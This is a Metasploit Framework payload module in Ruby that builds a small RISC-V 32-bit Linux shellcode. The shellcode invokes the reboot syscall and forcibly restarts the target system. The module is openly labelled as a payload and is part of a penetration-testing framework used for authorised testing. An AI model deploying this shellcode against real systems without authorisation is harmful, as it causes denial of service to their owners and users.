Path: blob/master/modules/payloads/singles/linux/riscv32le/reboot.rb
30117 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 3278include Msf::Payload::Linux::Riscv32le::Prepends9include Msf::Payload::Single1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Reboot',16'Description' => %q{17A very small shellcode for rebooting the system using18the reboot syscall. This payload is sometimes helpful19for testing purposes. Requires CAP_SYS_BOOT privileges.20},21'Author' => 'bcoles',22'License' => MSF_LICENSE,23'Platform' => 'linux',24'Arch' => ARCH_RISCV32LE,25'References' => [26['URL', 'https://man7.org/linux/man-pages/man2/reboot.2.html'],27['URL', 'https://github.com/bcoles/shellcode/blob/main/riscv32/reboot/reboot.s'],28]29)30)31end3233def generate(_opts = {})34shellcode =35[0xfee1e537].pack('V*') + # lui a0,0xfee1e36[0xead50513].pack('V*') + # addi a0,a0,-33937[0x281225b7].pack('V*') + # lui a1,0x281238[0x96958593].pack('V*') + # addi a1,a1,-168739[0x01234637].pack('V*') + # lui a2,0x123440[0x56760613].pack('V*') + # addi a2,a2,138341[0x08e00893].pack('V*') + # li a7,14242[0x00000073].pack('V*') # ecall4344super.to_s + shellcode45end46end474849